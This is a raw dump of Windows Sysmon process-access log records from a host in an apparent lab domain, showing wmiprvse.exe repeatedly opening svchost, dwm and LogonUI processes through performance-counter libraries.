13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004697Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004696Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004695Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004694Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004693Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004692Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004691Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004690Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004689Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004688Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004687Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004686Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004685Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004684Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004683Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004682Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 